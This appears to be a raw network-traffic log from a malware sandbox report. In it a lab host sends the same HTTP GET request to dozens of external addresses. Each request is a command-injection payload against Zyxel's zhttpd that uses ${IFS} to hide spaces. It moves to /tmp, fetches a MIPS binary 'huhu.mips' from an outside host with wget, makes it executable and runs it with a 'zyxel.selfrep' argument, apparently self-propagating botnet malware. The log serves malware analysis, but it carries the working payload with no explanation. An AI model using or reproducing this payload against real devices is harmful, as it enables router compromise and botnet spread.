                                            Feb 2, 2024 06:21:13.638695955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4506192.168.2.1539400171.180.157.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638755083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4507192.168.2.155846423.86.94.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638789892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4508192.168.2.155447688.101.31.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638818026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4509192.168.2.1536894213.145.14.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638844967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4510192.168.2.155135618.213.46.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638911009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4511192.168.2.1559802206.143.159.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638952971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4512192.168.2.1553700134.183.213.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638972044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4513192.168.2.153481099.141.52.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639013052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4514192.168.2.1560652176.166.135.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639043093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4515192.168.2.1543178207.200.126.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639081955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4516192.168.2.154975072.175.203.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639128923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4517192.168.2.15353305.162.39.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639167070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4518192.168.2.1534818208.47.194.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639209032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4519192.168.2.1547160149.145.133.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639250040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4520192.168.2.154302849.122.231.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639282942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4521192.168.2.1536772180.200.218.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639307976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4522192.168.2.1555414151.214.87.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639332056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4523192.168.2.154044087.92.105.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639384985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4524192.168.2.1540346185.102.223.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639408112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4525192.168.2.1548466157.158.202.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639461994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4526192.168.2.154823883.5.187.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639487982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4527192.168.2.1551586160.245.156.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639539957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4528192.168.2.155844898.181.231.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639561892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4529192.168.2.1540372129.111.53.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639619112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4530192.168.2.1545746165.94.210.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639647007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4531192.168.2.155589272.250.100.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639681101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4532192.168.2.154634446.157.197.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639717102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4533192.168.2.1557486187.181.194.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639763117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4534192.168.2.1560160199.75.37.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639916897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4535192.168.2.1546986159.61.254.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639939070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4536192.168.2.1535228209.11.141.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.639976978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4537192.168.2.1549424159.122.159.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640028954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4538192.168.2.155236418.106.140.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640070915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4539192.168.2.1547372142.225.70.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640103102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4540192.168.2.155671027.146.96.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640144110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4541192.168.2.1559464133.20.176.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640198946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4542192.168.2.1554110107.196.165.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640235901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4543192.168.2.1536092158.102.51.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640280008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4544192.168.2.154483089.14.51.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640304089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4545192.168.2.1533616145.238.65.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640331984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4546192.168.2.1552590151.192.28.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640372038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4547192.168.2.154766261.35.30.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640410900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4548192.168.2.155322444.241.169.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640430927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4549192.168.2.155555454.45.226.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640490055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4550192.168.2.1539210190.174.233.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640521049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4551192.168.2.154356253.144.71.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640553951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4552192.168.2.1557832199.50.88.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640604973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4553192.168.2.155877453.12.233.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640644073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4554192.168.2.1550156165.245.24.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640675068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4555192.168.2.1533960210.136.64.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640706062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4556192.168.2.1556228102.85.222.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640728951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4557192.168.2.155670434.231.12.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640767097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4558192.168.2.1532808130.218.178.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640773058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4559192.168.2.155642294.180.106.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640810966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4560192.168.2.1540848193.166.238.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640840054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4561192.168.2.1554934163.43.99.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640872002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4562192.168.2.153720091.104.233.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640923023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4563192.168.2.1537198173.126.178.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640948057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4564192.168.2.1554310176.44.222.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.640964031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4565192.168.2.1536342197.183.125.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641015053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4566192.168.2.1552298101.14.222.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641036034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4567192.168.2.1536748198.102.149.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641069889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4568192.168.2.1556690141.224.21.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.641124964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4569192.168.2.155455814.17.121.193443
                                            TimestampBytes transferredDirectionData
